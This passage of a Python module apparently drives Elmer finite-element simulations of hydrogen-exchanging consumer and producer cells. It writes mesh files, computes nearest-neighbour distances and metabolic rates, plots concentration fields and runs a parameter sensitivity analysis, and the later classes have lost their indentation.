        """Path of the solver input file inside its run directory."""
        self.get_run_dir(detail_level, sif_name)
        self.sif_file_path = os.path.join(self.run_dir, sif_name+'.sif')
        return self.sif_file_path
    def make_start_file(self, detail_level, sif_name):
        """Write Elmer's ELMERSOLVER_STARTINFO file for this run."""
        self.get_run_dir(detail_level, sif_name)
        file_path = os.path.join(self.run_dir, 'ELMERSOLVER_STARTINFO')
        with open(file_path, 'w') as f:
            f.write('''%s\n1''' %(sif_name+'.sif'))
    def make_mesh_files(self, biomass_array, detail_level):
        """Write the Elmer mesh: header, nodes, elements, boundary.

        biomass_array : 2D array of element body ids, one per grid cell.
        The mesh is a regular quad grid; 404 entries are quad elements,
        202 entries the four boundary edge groups.
        """
        self.get_detail_level_mesh_dir(detail_level)
        grid_length = self.side_length * detail_level
        num_elements = (grid_length)**2
        num_nodes = (grid_length+1)**2
        ### Make mesh.header
        header_path = os.path.join(self.detail_level_mesh_dir, 'mesh.header')
        # The 2 denotes dimensions, 202's are boundaries, 404's are elements.
        with open(header_path, 'w') as f:
            f.write('%d\t%d\t%d\t\n2\t\n202\t%d\t\n404\t%d\t\n\t'
                %(num_nodes, num_elements, num_elements, num_elements, num_elements))
        ### Make mesh.nodes
        text = ''
        for i in range(num_nodes):
            # Shouldn't this take account of detail_level?
            (y, x) = divmod(i, (grid_length+1))
            # Consider changing this line to
            #text += '%d -1 %.1f %.1f 0.0\n' %(i+1, x, y)
            text += str(i+1)+' -1 '+str(x)+' '+str(y)+' 0.0\n'
        nodes_path = os.path.join(self.detail_level_mesh_dir, 'mesh.nodes')
        with open(nodes_path, 'w') as f:
            f.write(text)
        ### Make mesh.elements
        text = ''
        counter = 0
        for (i, j), body in numpy.ndenumerate(biomass_array):
            counter += 1
            n1 = (j+1) + (i*(grid_length+1))
            n2 = n1 + 1
            n3 = n2 + (grid_length+1)
            n4 = n3 - 1
            text += '%d %d 404 %d %d %d %d \n' %(counter, body, n1, n2, n3, n4)
        elements_path = os.path.join(self.detail_level_mesh_dir, 'mesh.elements')
        with open(elements_path, 'w') as f:
            f.write(text)
        ### Make mesh.boundary
        text = ''
        counter = 0
        # Along the bottom of the array (x=max) from left (y=0) to right (y=max).
        e_base = grid_length*(grid_length - 1) + 1
        n_base = grid_length*(grid_length + 1) + 1
        for i in range(grid_length):
            counter += 1
            element = e_base + i
            node = n_base + i
            text += '%d 1 %d 0 202 %d %d \n' %(counter, element, node, node+1)
        # Down the left of the array (y=0), from top (x=0) to bottom (x=max).
        n_base = grid_length + 1
        for i in range(grid_length):
            counter += 1
            element = (i*grid_length) + 1
            node = 1 + i*n_base
            text += '%d 2 %d 0 202 %d %d \n' %(counter, element, node, node+n_base)
        # Along the top of the array (x=0) from left (y=0) to right (y=max).
        for i in range(grid_length):
            counter += 1
            text += '%d 3 %d 0 202 %d %d \n' %(counter, i+1, i+1, i+2)
        # Down the right of the array (y=max), from top (x=0) to bottom (x=max).
        n_base = grid_length + 1
        for i in range(grid_length):
            counter += 1
            element = (i+1)*grid_length
            node = (i+1)*n_base
            text += '%d 4 %d 0 202 %d %d \n' %(counter, element, node+n_base, node)
        boundary_path = os.path.join(self.detail_level_mesh_dir, 'mesh.boundary')
        with open(boundary_path, 'w') as f:
            f.write(text)
    def set_up_population(self, detail_level):
        """Create (or reload) 'cell_locations.xml' for a detail level,
        stamping cells into the biomass array and writing mesh files on
        first creation."""
        grid_length = self.side_length * detail_level
        cells_file = self.get_detail_level_results(detail_level)
        # If cells_file.events is empty then the detail level directory has
        # probably only just been created, and this file does not yet exist.
        if cells_file.events == []:
            cells_file.set_space_parameters(wrapping=self.wrapping,
                                is_3d=self.is_3d, side_length=self.side_length)
            bio_array_path = os.path.join(self.detail_level_dir, 'bio_array')
            # 'int' replaces the deprecated numpy.int alias.
            self.bio_array = numpy.ones((grid_length,)*2, dtype=int)
            last_path = os.path.join(self.root_dir, 'lastIter',
                                                'event_location_last.xml')
            last_file = SimulationResultsFile(path=last_path, read_only=True)
            cells_file.copy_event_list(last_file)
            cells_file.set_up_population(detail_level, grid_length,
                                            self.wrapping, self.bio_array)
            toolbox_basic.save_array(self.bio_array, bio_array_path)
            self.make_mesh_files(self.bio_array, detail_level)
            # Finally, update and save the 'cell_locations.xml' file.
            head = 'mark,x,i_min,i_max,y,j_min,j_max'
            if self.is_3d: head += ',z,k_min,k_max'
            cells_file.set_event_list_header(head)
            cells_file.write()
        else:
            cells_file.setup_ranges(grid_length, self.wrapping)
        return cells_file
    def calc_amean_surf_concn(self, concn_array):
        """Ask each event for its mean surface concentration.

        NOTE(review): self.event_list is never assigned in this class -
        this method looks vestigial; confirm before relying on it.
        """
        for event in self.event_list:
            event.calc_amean_surf_concn(concn_array)
    def plot_concn_array(self, axis, detail_level, sif_name, set_as_white=None, plot_cs=True):
        """Render the concentration field with a red-white-green map.

        set_as_white optionally pins the colormap midpoint to a given
        concentration.  Returns a colorbar (plot_cs=True) or the image.
        """
        array = self.get_concn_array(detail_level, sif_name)
        extent = [-0.5/detail_level, self.side_length + 0.5/detail_level]*2
        bottom_red, top_red = 0.1, 0.7
        bottom_green, top_green = 0.6, 0.0
        bottom_blue, top_blue = 0.1, 0.5
        mid_point = 0.5
        if set_as_white is not None:
            max_val, min_val = numpy.max(array), numpy.min(array)
            up_diff, down_diff = max_val - set_as_white, set_as_white - min_val
            max_diff, total_diff = max(up_diff, down_diff), max_val - min_val
            # NOTE(review): the two relative diffs below are never used.
            up_rel_diff, down_rel_diff = up_diff/max_diff, down_diff/max_diff
            mid_point = down_diff/total_diff
        cdict = {'red': ((0, bottom_red, bottom_red),
                         (mid_point, 1, 1),
                         (1, top_red, top_red)),
               'green': ((0, bottom_green, bottom_green),
                         (mid_point, 1, 1),
                         (1, top_green, top_green)),
                'blue': ((0, bottom_blue, bottom_blue),
                         (mid_point, 1, 1),
                         (1, top_blue, top_blue))}
        my_cmap = \
            matplotlib.colors.LinearSegmentedColormap('my_cmap', cdict, 255)
        cs = axis.imshow(array, interpolation='nearest', origin='lower',
                                            extent=extent, cmap=my_cmap)
        axis.set_xlim(0.0, self.side_length), axis.set_ylim(0.0, self.side_length)
        if plot_cs:
            cbar = toolbox_plotting.make_colorbar(axis, cs, fontsize=8)
            return cbar
        else:
            return cs
    def plot_rate_array(self, axis, detail_level, sif_name):
        """Image of the rate array (blue = consumption, red = production),
        with symmetric colour limits and a colorbar."""
        array = self.get_rate_array(detail_level, sif_name)
        extent = [0.0, self.side_length]*2
        max_val = numpy.max(abs(array))
        cdict = {'red': ((0, 0, 0), (0.5, 1, 1), (1, 1, 1)),
                    'green': ((0, 0, 0), (0.5, 1, 1), (1, 0, 0)),
                    'blue': ((0, 1, 1), (0.5, 1, 1), (1, 0, 0))}
        cmap = matplotlib.colors.LinearSegmentedColormap('cmap', cdict, 255)
        cs = axis.imshow(array, interpolation='nearest', extent=extent,
                                            origin='lower', cmap=cmap)
        cs.set_clim(-max_val, max_val)
        axis.set_xlim(0.0, self.side_length)
        axis.set_ylim(0.0, self.side_length)
        toolbox_plotting.make_colorbar(axis, cs)
    def plot_population(self, axis, detail_level, sif_name):
        """Image of cell positions only: the sign of the rate array
        (blue consumers, red producers, white empty)."""
        array = numpy.sign(self.get_rate_array(detail_level, sif_name))
        extent = [0.0, self.side_length]*2
        cdict = {'red': ((0, 0, 0), (0.5, 1, 1), (1, 1, 1)),
                    'green': ((0, 0, 0), (0.5, 1, 1), (1, 0, 0)),
                    'blue': ((0, 1, 1), (0.5, 1, 1), (1, 0, 0))}
        cmap = matplotlib.colors.LinearSegmentedColormap('cmap', cdict, 3)
        cs = axis.imshow(array, interpolation='nearest', extent=extent,
                                            origin='lower', cmap=cmap)
        cs.set_clim(-1.0, 1.0)
        axis.set_xlim(0.0, self.side_length)
        axis.set_ylim(0.0, self.side_length)
    def calc_nearest_neighbor_distances(self, detail_level):
        """Attach nearest-neighbour distances to every event and save.

        Adds three columns: sNN_dist (nearest same-type cell, excluding
        the cell itself), oNN_dist (nearest other-type cell) and
        eNN_dist (the smaller of the two).  Periodic domains are handled
        by tiling the points before building the KD-trees.
        """
        rf = self.get_detail_level_results(detail_level)
        # Bug fix: the original tested 'eNN_dist' three times, so files
        # missing only the other two columns were never completed.
        if rf.is_event_list_column_name('eNN_dist') and \
                        rf.is_event_list_column_name('oNN_dist') and \
                        rf.is_event_list_column_name('sNN_dist'):
            return rf
        cons_points = numpy.array([e.position() for e in rf.consumers()])
        prod_points = numpy.array([e.position() for e in rf.producers()])
        if self.wrapping:
            cons_points = wrap_points(cons_points, self.side_length, is_3d=self.is_3d)
            prod_points = wrap_points(prod_points, self.side_length, is_3d=self.is_3d)
        cons_tree = KDTree(cons_points)
        prod_tree = KDTree(prod_points)
        for e in rf.events:
            # k=2: the first same-type hit is the cell itself (distance 0).
            c_dist = cons_tree.query(e.position(), k=2)[0]
            p_dist= prod_tree.query(e.position(), k=2)[0]
            if (e.vars['mark'] == 2):
                e.vars['sNN_dist'] = c_dist[1]
                e.vars['oNN_dist'] = p_dist[0]
            else:
                e.vars['sNN_dist'] = p_dist[1]
                e.vars['oNN_dist'] = c_dist[0]
            e.vars['eNN_dist'] = min(e.vars['sNN_dist'], e.vars['oNN_dist'])
        rf.add_event_list_column_name('eNN_dist')
        rf.add_event_list_column_name('oNN_dist')
        rf.add_event_list_column_name('sNN_dist')
        #rf.eventList.update_text()
        rf.write()
        return rf
    def get_mean_NN_dist(self, detail_level, mean='amean', dist='oNN_dist'):
        """Mean nearest-neighbour distance over all events.

        mean : one of 'amean', 'gmean', 'hmean'.
        dist : which per-event distance column to average.
        """
        rf = self.calc_nearest_neighbor_distances(detail_level)
        dists = [e.vars[dist] for e in rf.events]
        if not mean in ['amean', 'gmean', 'hmean']:
            # Typo fixed: the message previously read 'toolbix_elmer'.
            toolbox_basic.error_message('toolbox_elmer.Simulation.get_mean_NN_dist()',
                                            'mean not recognised: %s'%(mean))
        # Dispatch table replaces the original Python 2 'exec' statement.
        mean_func = {'amean': amean, 'gmean': gmean, 'hmean': hmean}[mean]
        return mean_func(dists)
    def scatter_oNN_dist_vs_rate(self, axis, detail_level, sif_name, markersize=5):
        """Scatter absolute metabolic rate against interspecies N-N
        distance (blue = consumers, red = producers)."""
        rf = self.get_combined_results(detail_level, sif_name)
        cons_rates = [-e.vars['rate'] for e in rf.consumers()]
        cons_dists = [e.vars['oNN_dist'] for e in rf.consumers()]
        axis.plot(cons_dists, cons_rates, '.', color='blue', markersize=markersize)
        prod_rates = [e.vars['rate'] for e in rf.producers()]
        prod_dists = [e.vars['oNN_dist'] for e in rf.producers()]
        axis.plot(prod_dists, prod_rates, '.', color='red', markersize=markersize)
        axis.set_xlabel(r'Interspecies N-N distance ($\mu$m)')
        axis.set_ylabel('Abs. metabolic rate '+r'(zmol $cell^{-1} ms^{-1}$)')
        axis.set_xlim(1, axis.get_xlim()[1])
    def scatter_oNN_dist_vs_concn(self, axis, detail_level, sif_name, markersize=5):
        """Scatter cell-surface concentration against interspecies N-N
        distance (blue = consumers, red = producers)."""
        rf = self.get_combined_results(detail_level, sif_name)
        cons_concns = [e.vars['amean_surf_concn'] for e in rf.consumers()]
        cons_dists = [e.vars['oNN_dist'] for e in rf.consumers()]
        axis.plot(cons_dists, cons_concns, '.', color='blue', markersize=markersize)
        prod_concns = [e.vars['amean_surf_concn'] for e in rf.producers()]
        prod_dists = [e.vars['oNN_dist'] for e in rf.producers()]
        axis.plot(prod_dists, prod_concns, '.', color='red', markersize=markersize)
        axis.set_xlabel('Interspecies nearest neighbour distance')
        axis.set_ylabel('Surface concentration')
        axis.set_xlim(1, axis.get_xlim()[1])
    def plot_kinetics(self, axis, detail_level, sif_name, maxs):
        """Plot production (red) and |consumption| (blue) kinetics over
        concentrations 0..maxs."""
        consume_rate, produce_rate = \
                        self.get_consume_produce_functions(detail_level, sif_name)
        p = list(numpy.linspace(0, maxs, num=1000))
        prod = [produce_rate(pval) for pval in p]
        cons = [-consume_rate(pval) for pval in p]
        axis.plot(p, prod, 'r-')
        axis.plot(p, cons, 'b-')
        #axis.set_xlabel(r'Product concentration ($\mu$M)')
        axis.set_xlabel(r'Hydrogen concentration ($\mu$M)')
        axis.set_ylabel('Metabolic rate '+r'(zmol $cell^{-1} ms^{-1}$)')
    def make_run_plot(self, detail_level, sif_name, maxP=None):
        """Compose the four-panel summary figure for one run (population,
        kinetics, concentration field, distance-vs-rate scatter) and
        save it as 'run_plot.pdf' in the run directory."""
        fig = toolbox_plotting.ThesisFigure(double_column=True)
        axis = fig.add_subplot('A', 221)
        #self.plot_rate_array(axis, detail_level, sif_name)
        self.plot_population(axis, detail_level, sif_name)
        toolbox_plotting.empty_padding_axis(axis, "bottom")
        axis = fig.add_subplot('B', 222)
        toolbox_plotting.empty_padding_axis(axis, "bottom")
        if maxP is None:
            # Round the concentration maximum up to the next power of ten.
            maxP = numpy.max(self.get_concn_array(detail_level, sif_name))
            maxP = 10**math.ceil(math.log10(maxP))
        self.plot_kinetics(axis, detail_level, sif_name, maxP)
        axis.text(8, 0.2, r'$q_{A}([H])$', color='r', va='center', ha='center')
        axis.text(8, 0.8, r'$-q_{B}([H])$', color='b', va='center', ha='center')
        analytic = AnalyticApproach()
        analytic.set_parameters(A=1, qmaxA=1, pmax=10, kA=10, qmaxB=5, pmin=0.04, kB=30)
        p_equal = analytic.calc_equal_concn()
        r_equal = analytic.production(p_equal)
        axis.plot([p_equal]*2, [0,r_equal+0.05],
                                    color='0.5', linestyle='-', zorder=-10)
        axis.text(p_equal, r_equal+0.05, '%.2f'%(p_equal),
                        color='0.5', va='bottom', ha='center', fontsize=8)
        axis.plot([0, p_equal+0.5], [r_equal]*2,
                                    color='0.5', linestyle='-', zorder=-10)
        axis.text(p_equal+0.6, r_equal, '%.2f'%(r_equal),
                            color='0.5', va='center', ha='left', fontsize=8)
        axis = fig.add_subplot('C', 223)
        cs = self.plot_concn_array(axis, detail_level, sif_name, plot_cs=False)
        cbar = toolbox_plotting.make_colorbar(axis, cs, side="bottom")
        #label = r'Product concentration ($\mu$M)'
        label = r'Hydrogen concentration ($\mu$M)'
        # NOTE(review): hard-coded tick positions; adjust per dataset.
        cbar.set_ticks([2.0, 2.1, 2.2, 2.3, 2.4, 2.5, 2.6, 2.7])
        cbar.set_label(label)
        axis.set_xticklabels(['']*10)
        axis = fig.add_subplot('D', 224)
        toolbox_plotting.empty_padding_axis(axis, "bottom")
        self.calc_nearest_neighbor_distances(detail_level)
        self.scatter_oNN_dist_vs_rate(axis, detail_level, sif_name)
        fig.subplots_adjust(left=0.05, right=0.98, bottom=0.08, top=0.96,
                                                wspace=0.3, hspace=0.25)
        fig.process_subplots(label_pos=(0.0, 1.1))
        axis = fig.find_axis_from_label('C')
        axis.tick_params(bottom="off")
        fig.save(os.path.join(self.get_run_dir(detail_level, sif_name), 'run_plot.pdf'))
    def check_runs(self, rel_tol=1E-3):
        """Report runs whose mass-balance error exceeds rel_tol and runs
        missing a cell_rates.xml file."""
        for dl_dir in toolbox_basic.subdir_list(self.root_dir, 'detail_level_*'):
            run_dirs = toolbox_basic.subdir_list(dl_dir)
            for run_dir in run_dirs:
                if os.path.basename(run_dir) == 'mesh':
                    continue
                cell_file = os.path.join(run_dir, 'cell_rates.xml')
                if os.path.isfile(cell_file):
                    cell_file = SimulationResultsFile(path=cell_file, read_only=True)
                    rel_diff = cell_file.get_relative_difference()
                    if rel_diff > rel_tol:
                        print('%s has rel_diff = %f'%(run_dir, rel_diff))
                else:
                    print('%s has no cell_rates.xml file'%(run_dir))
    def get_amean_concn(self, detail_level, sif_name):
        """Arithmetic-mean concentration of a run's field."""
        rf = self.get_run_results(detail_level, sif_name, read_only=True)
        return rf.get_amean_concn()
    def get_mean_surf_concn(self, detail_level, sif_name,
                                        cell_type='all', mean='amean'):
        """Mean cell-surface concentration of a run; see
        SimulationResultsFile.get_mean_surf_concn for options."""
        rf = self.get_run_results(detail_level, sif_name, read_only=True)
        out = rf.get_mean_surf_concn(cell_type=cell_type, mean=mean)
        return out
    def get_sif_names(self, detail_level):
        """Names of run subdirectories containing a matching .sif file."""
        dl_dir = self.get_detail_level_dir(detail_level)
        out = []
        for subdir in toolbox_basic.subdir_list(dl_dir):
            base_name = os.path.basename(subdir)
            sif_path = os.path.join(subdir, base_name+'.sif')
            if os.path.exists(sif_path):
                out.append(base_name)
        return out
class SimulationResultsFile(toolbox_results.ResultXMLfile):
    """Results XML file with a <simulation> element plus a CSV-backed
    <eventList> of per-cell records (each re-cast to EventResult)."""
    def __init__(self, path=None, read_only=False, header='mark,x,y'):
        """Open (or start) the file and parse its event list.

        header is accepted for interface compatibility but is unused;
        headers are set via set_event_list_header().
        """
        toolbox_results.ResultXMLfile.__init__(self, path=path,
                                    root_name='elmer', read_only=read_only)
        self.simulation_root = self.find('./simulation')
        if self.simulation_root is None:
            self.simulation_root = xmlTree.SubElement(self.root, 'simulation')
        self.eventList = self.get_subresult('./eventList')
        if self.eventList is None:
            # Bug fix: was 'toolbox_result.ResultXMLfile' (NameError on
            # any file without an <eventList>); the module is imported
            # as 'toolbox_results'.
            self.eventList = toolbox_results.ResultXMLfile(root_name='eventList')
            self.append_subresult(self.eventList)
        self.events = self.eventList.read_in_text()
        # Re-cast parsed CSV lines so they gain EventResult's behaviour.
        for line in self.events:
            line.__class__ = EventResult
    def get_event_list_column_names(self):
        """Column names from the event list's CSV header."""
        return self.eventList.header.split(',')
    def set_space_parameters(self, wrapping=None, is_3d=None, side_length=None):
        """Record domain parameters on <simulation>/<space>; None = keep."""
        space = self.find('./simulation/space')
        if space is None:
            sim = self.find('./simulation')
            space = xmlTree.SubElement(sim, 'space')
        if wrapping is not None: space.set('wrapping', str(wrapping))
        if is_3d is not None: space.set('is_3d', str(is_3d))
        if side_length is not None: space.set('side_length', str(side_length))
    def copy_event_list(self, simulation_results_file):
        """Replace this file's event list with another file's."""
        self.remove_subresult(self.eventList)
        self.append_subresult(simulation_results_file.eventList)
        self.eventList = simulation_results_file.eventList
        self.events = simulation_results_file.events
    def set_event_list_header(self, header):
        """Set the CSV header and mirror it on the XML attribute."""
        self.eventList.header = header
        self.eventList.root.set('header', header)
    def add_event_list_column_name(self, column_name):
        """Append a column name unless it is already present."""
        if self.is_event_list_column_name(column_name): return
        self.eventList.add_column_name(column_name)
    def is_event_list_column_name(self, column_name):
        """True when column_name is already in the CSV header."""
        return (column_name in self.get_event_list_column_names())
    def set_up_population(self, detail_level, grid_length, wrapping, bio_array):
        """Refine every event and stamp its footprint into bio_array."""
        for event in self.events:
            event.apply_detail_level(detail_level)
            event.setup_ranges(grid_length, wrapping)
            event.stamp_bio_array(bio_array)
    def apply_detail_level(self, detail_level):
        """Refine every event's coordinates to the given detail level."""
        for event in self.events:
            event.apply_detail_level(detail_level)
    def setup_ranges(self, grid_length, wrapping):
        """Recompute every event's grid index ranges."""
        for event in self.events:
            event.setup_ranges(grid_length, wrapping)
    def stamp_bio_array(self, bio_array):
        """Mark every event's grid footprint in bio_array."""
        for event in self.events:
            event.stamp_bio_array(bio_array)
    def consumers(self):
        """Events with mark 2."""
        return [e for e in self.events if e.vars['mark'] == 2]
    def producers(self):
        """Events with mark 3."""
        return [e for e in self.events if e.vars['mark'] == 3]
    def calc_rates_from_concn_array(self, concn_array, consume_rate,
                                        produce_rate, rate_array=None):
        """Evaluate each cell's rate and mean surface concentration."""
        for event in self.events:
            event.calc_rate_from_concn_array(concn_array, consume_rate,
                                    produce_rate, rate_array=rate_array)
            event.calc_amean_surf_concn(concn_array)
    def set_concn_rate_results(self, concn_array, rate_array):
        """Store flux/concentration summary stats on <concn_rate>."""
        # This doesn't take account of detail_level!
        # See update_concn_rate_results()
        calculated_flux = \
                    numpy.sum(numpy.absolute(rate_array))/2
        rel_diff = abs(numpy.sum(rate_array))/calculated_flux
        max_concn = numpy.max(concn_array)
        amean_concn = amean(concn_array)
        min_concn = numpy.min(concn_array)
        concn_rate = self.find('./simulation/concn_rate')
        if concn_rate is None:
            sim = self.find('./simulation')
            concn_rate = xmlTree.SubElement(sim, 'concn_rate')
        concn_rate.set('calculated_flux', str(calculated_flux))
        concn_rate.set('rel_diff', str(rel_diff))
        concn_rate.set('max_concn', str(max_concn))
        concn_rate.set('amean_concn', str(amean_concn))
        concn_rate.set('min_concn', str(min_concn))
    def update_concn_rate_results(self, detail_level):
        """Recompute flux and balance error from the per-cell rates."""
        # This is a bit of a fudge: set_concn_rate_results() implicitly assumes
        # detail_level = 1
        production = numpy.sum([e.vars['rate'] for e in self.producers()])
        consumption = numpy.sum([e.vars['rate'] for e in self.consumers()])
        calculated_flux = (production - consumption)/2
        rel_diff = abs(production + consumption)/calculated_flux
        concn_rate = self.find('./simulation/concn_rate')
        concn_rate.set('calculated_flux', str(calculated_flux))
        concn_rate.set('rel_diff', str(rel_diff))
    def get_amean_concn(self):
        """Arithmetic-mean concentration stored on <concn_rate>.

        XPath fixed: '.simulation/...' is not a path ElementTree
        resolves; the relative path must be './simulation/...'.
        """
        return float(self.find('./simulation/concn_rate').attrib['amean_concn'])
    def get_calculated_flux(self):
        """Total flux stored on <concn_rate> (XPath fixed as above)."""
        return float(self.find('./simulation/concn_rate').attrib['calculated_flux'])
    def get_relative_difference(self):
        """Mass-balance error stored on <concn_rate> (XPath fixed)."""
        return float(self.find('./simulation/concn_rate').attrib['rel_diff'])
    def get_mean_surf_concn(self, cell_type='all', mean='amean'):
        """Mean of per-cell 'amean_surf_concn' over the chosen cells.

        cell_type : 'all', 'consumers' or 'producers'.
        mean : 'amean', 'gmean' or 'hmean'.
        """
        if cell_type == 'all':
            events = self.events
        elif cell_type == 'consumers':
            events = self.consumers()
        elif cell_type == 'producers':
            events = self.producers()
        else:
            # Previously an unknown cell_type fell through to a NameError.
            raise ValueError('cell_type not recognised: %s'%(cell_type))
        if not mean in ['amean', 'gmean', 'hmean']:
            toolbox_basic.error_message(
                'toolbox_elmer.SimulationResultsFile.get_mean_surf_concn()',
                'mean not recognised: %s'%(mean))
        # Dispatch table replaces the original Python 2 'exec' statement.
        mean_func = {'amean': amean, 'gmean': gmean, 'hmean': hmean}[mean]
        return mean_func([e.vars['amean_surf_concn'] for e in events])
class EventResult(toolbox_results.SingleCSVline):
def __init__(self, header, text):
toolbox_results.SingleCSVline.__init__(self, header, text)
def apply_detail_level(self, detail_level):
# If detail_level is odd:
if (detail_level%2 == 1):
diff = int((detail_level-1)/2)
i_cen = int(self.vars['x'] * detail_level)
self.vars['x'] = (i_cen+0.5)/detail_level
self.vars['i_min'] = i_cen - diff
self.vars['i_max'] = i_cen + diff + 1
j_cen = int(self.vars['y'] * detail_level)
self.vars['y'] = (j_cen+0.5)/detail_level
self.vars['j_min'] = j_cen - diff
self.vars['j_max'] = j_cen + diff + 1
if 'z' in self.vars.keys():
k_cen = int(self.vars['z'] * detail_level)
self.vars['z'] = (k_cen+0.5)/detail_level
self.vars['k_min'] = k_cen - diff
self.vars['k_max'] = k_cen + diff + 1
# If detail_level is even:
else:
diff = int(detail_level/2)
i_cen = int(round(self.vars['x'] * detail_level))
self.vars['x'] = i_cen/detail_level
self.vars['i_min'] = i_cen - diff
self.vars['i_max'] = i_cen + diff
j_cen = int(round(self.vars['y'] * detail_level))
self.vars['y'] = j_cen/detail_level
self.vars['j_min'] = j_cen - diff
self.vars['j_max'] = j_cen + diff
if 'z' in self.vars.keys():
k_cen = int(round(self.vars['z'] * detail_level))
self.vars['z'] = k_cen/detail_level
self.vars['k_min'] = k_cen - diff
self.vars['k_max'] = k_cen + diff
def setup_ranges(self, grid_length, wrapping):
# Take care of any edge effects:
i_range = range(self.vars['i_min'], self.vars['i_max'])
j_range = range(self.vars['j_min'], self.vars['j_max'])
if 'z' in self.vars.keys():
k_range = range(self.vars['k_min'], self.vars['k_max'])
if wrapping:
self.i_range = [i%grid_length for i in i_range]
self.j_range = [j%grid_length for j in j_range]
if 'z' in self.vars.keys():
self.k_range = [k%grid_length for k in k_range]
else:
self.i_range = [i for i in i_range if i >= 0 and i <= grid_length]
self.j_range = [j for j in j_range if j >= 0 and j <= grid_length]
if 'z' in self.vars.keys():
self.k_range = [k for k in k_range if k>=0 and k<=grid_length]
def stamp_bio_array(self, bio_array):
for i in self.i_range:
for j in self.j_range:
if 'z' in self.vars.keys():
for k in self.k_range:
bio_array[i][j][k] = self.vars['mark']
else:
bio_array[i][j] = self.vars['mark']
def calc_rate_from_concn_array(self, concn_array, consume_rate,
produce_rate, rate_array=None):
self.vars['rate'] = 0.0
if self.vars['mark'] == 2: kinetic_rate = consume_rate
else: kinetic_rate = produce_rate
counter = 0
for (i, j) in [(i, j) for i in self.i_range for j in self.j_range]:
concns = [concn_array[I][J] for I in [i, i+1] for J in [j, j+1]]
rates = [kinetic_rate(concn) for concn in concns]
mean_rate = numpy.mean(rates)
if not rate_array == None:
rate_array[i][j] = mean_rate
self.vars['rate'] += mean_rate
counter += 1
self.vars['rate'] /= counter
return self.vars['rate']
def calc_amean_surf_concn(self, concn_array):
surface_nodes = [(i, self.j_range[0]) for i in self.i_range] + \
[(i, self.j_range[-1]+1) for i in self.i_range] + \
[(self.i_range[0], j) for j in self.j_range[1:]] + \
[(self.i_range[-1]+1, j) for j in self.j_range+[self.j_range[-1]+1]]
concns = [concn_array[i][j] for (i, j) in surface_nodes]
self.vars['amean_surf_concn'] = numpy.mean(concns)
return self.vars['amean_surf_concn']
def position(self):
if 'z' in self.vars.keys():
return (self.vars['x'], self.vars['y'], self.vars['z'])
else:
return (self.vars['x'], self.vars['y'])
class AnalyticApproach:
def __init__(self):
self.A = 1
self.qmaxA = 1.0
self.pmax = 10.0
self.kA = 1.0
self.B = 1
self.qmaxB = 1.0
self.pmin = 0.1
self.kB = 1.0
def set_parameters(self, A=None, qmaxA=None, pmax=None, kA=None,
B=None, qmaxB=None, pmin=None, kB=None):
self.A = self.A if A == None else A
self.qmaxA = self.qmaxA if qmaxA == None else qmaxA
self.pmax = self.pmax if pmax == None else pmax
self.kA = self.kA if kA == None else kA
self.B = self.B if B == None else B
self.qmaxB = self.qmaxB if qmaxB == None else qmaxB
self.pmin = self.pmin if pmin == None else pmin
self.kB = self.kB if kB == None else kB
def production(self, p):
return self.A*self.qmaxA*(self.pmax-p)/(self.pmax+self.kA+p)
def calc_equal_concn(self):
qmaxAA, qmaxBB = self.qmaxA*self.A, self.qmaxB*self.B
q2 = qmaxAA + qmaxBB
q1 = qmaxAA*(self.kB + self.pmin - self.pmax) \
+ qmaxBB*(self.kA + self.pmax - self.pmin)
q0 = - qmaxBB*self.kA*self.pmin \
- qmaxAA*self.kB*self.pmax - q2*self.pmax*self.pmin
roots = numpy.roots([q2, q1, q0])
p = max(roots)
return p
def calc_equal_concn_rate(self):
p = self.calc_equal_concn()
return self.production(p)
def sensitivity_analysis(self, cv=0.1, return_rate=False, return_diffs=True):
params = (self.A, self.qmaxA, self.pmax, self.kA,
self.B, self.qmaxB, self.pmin, self.kB)
if return_rate:
norm_val = self.calc_equal_concn_rate()
else:
norm_val = self.calc_equal_concn()
max_val, min_val = norm_val, norm_val
cv_range = [(1-cv), 1, (1+cv)]
for a in cv_range:
for qa in cv_range:
for px in cv_range:
for ka in cv_range:
for b in cv_range:
for qb in cv_range:
for pn in cv_range:
for kb in cv_range:
self.set_parameters(A=a*params[0],
qmaxA=qa*params[1],
pmax=px*params[2],
kA=ka*params[3],
B=b*params[4],
qmaxB=qb*params[5],
pmin=pn*params[6],
kB=kb*params[7])
if return_rate:
val = self.calc_equal_concn_rate()
else:
val = self.calc_equal_concn()
max_val = max(max_val, val)
min_val = min(min_val, val)
self.set_parameters(A=params[0], qmaxA=params[1], pmax=params[2],
kA=params[3], B=params[4], qmaxB=params[5],
pmin=params[6], kB=params[7])
if return_diffs:
minus_diff = norm_val - min_val
plus_diff = max_val - norm_val
return minus_diff, plus_diff
else:
return min_val, max_val
class SimCollection:
def __init__(self, simulation):
if isinstance(simulation, list):
self.simulations = simulation
simulation = self.simulations[0]
else:
self.simulations = [simulation]
self.wrapping = simulation.wrapping
self.side_length = simulation.side_length
self.is_3d = simulation.is_3d
self.consumers = simulation.consumers
self.producers = simulation.producers
self.random_seed = simulation.random_seed
def add_if_belongs(self, simulation, diffs_allowed=['random_seed']):
comparitor = self.simulations[0]
belongs = True
if not simulation.wrapping == self.wrapping and \
not 'wrapping' in diffs_allowed:
belongs = False
if not simulation.side_length == self.side_length and \
not 'side_length' in diffs_allowed:
belongs = False
if not simulation.is_3d == self.is_3d and \
not 'is_3d' in diffs_allowed:
belongs = False
if not simulation.consumers == self.consumers and \
not 'consumers' in diffs_allowed:
belongs = False
if not simulation.producers == self.producers and \
not 'producers' in diffs_allowed:
belongs = False
if not simulation.random_seed == self.random_seed and \
not 'random_seed' in diffs_allowed:
belongs = False
if belongs:
self.simulations.append(simulation)
return belongs
def get_calculated_fluxes(self, detail_level, sif_name):
out = []
for sim in self.simulations:
rf = sim.get_run_results(detail_level, sif_name)
if detail_level > 1:
rf.update_concn_rate_results(detail_level)
out.append(rf.get_calculated_flux())
return out
def get_amean_concns(self, detail_level, sif_name):
return \
[sim.get_run_results(detail_level, sif_name).get_amean_concn() \
for sim in self.simulations]
def estimates_from_concn(self, detail_level, sif_name, D, pmin,
dist_mean='amean'):
sides = 6 if self.is_3d else 4
estimates = []
for sim in self.simulations:
p = sim.get_amean_concn(detail_level, sif_name)
d = sim.get_mean_NN_dist(detail_level, mean=dist_mean)
estimates.append(D*self.producers*sides*(p-pmin)/d)
return estimates
def estimates_from_surf_concn(self, detail_level, sif_name, D,
dist_mean='amean'):
sides = 6 if self.is_3d else 4
estimates = []
for sim in self.simulations:
pmin = sim.get_mean_surf_concn(detail_level, sif_name,
